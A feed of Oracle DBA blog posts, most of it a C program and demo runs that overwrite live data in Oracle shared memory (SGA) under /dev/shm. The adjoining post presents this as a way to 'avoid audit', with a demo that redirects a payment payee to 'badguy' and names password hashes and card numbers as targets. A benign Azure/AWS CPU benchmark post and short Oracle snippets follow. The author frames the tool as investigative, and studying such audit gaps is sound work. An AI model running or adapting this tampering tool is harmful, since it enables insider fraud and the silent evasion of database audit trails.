Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.
.
.
.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. Creating a new virtual machine, using the “quick create” option with Oracle Linux, and choosing a 4-core “A3″ standard instance.

I must say I like the machine naming into built-in “clouadpp.net” DNS that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than AWS, though no more than a few minutes. And speaking of IP addresses, both start with 191.236. addresses assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry, due to the lack of north american IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a rows:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 mB/sec

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs and all from gzip, so no large system overhead here. Also, “%st”, time reported “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Having a look at throughput here, by creating a basic A3 instance “marc-cpu-basic” that otherwise matches exactly marc-cpu created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the identical stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a rows:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up Comparison chart

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than a standard instance, in spite of having the same CPU configuration.

Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
Vendors sell some rather expensive software for auditing Oracle database, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));
Table created.
PDB1@ORCL> insert into payment_batch values ('vendor');
1 row created.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
PDB1@ORCL> commit;
Commit complete.
PDB1@ORCL> alter system flush buffer_cache;
System altered.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table: And then populate it with a conventional insert: We find there are no statistics associated with the table until we explicitly collect them: But if we were to now create an index on this […]
Categories: DBA Blogs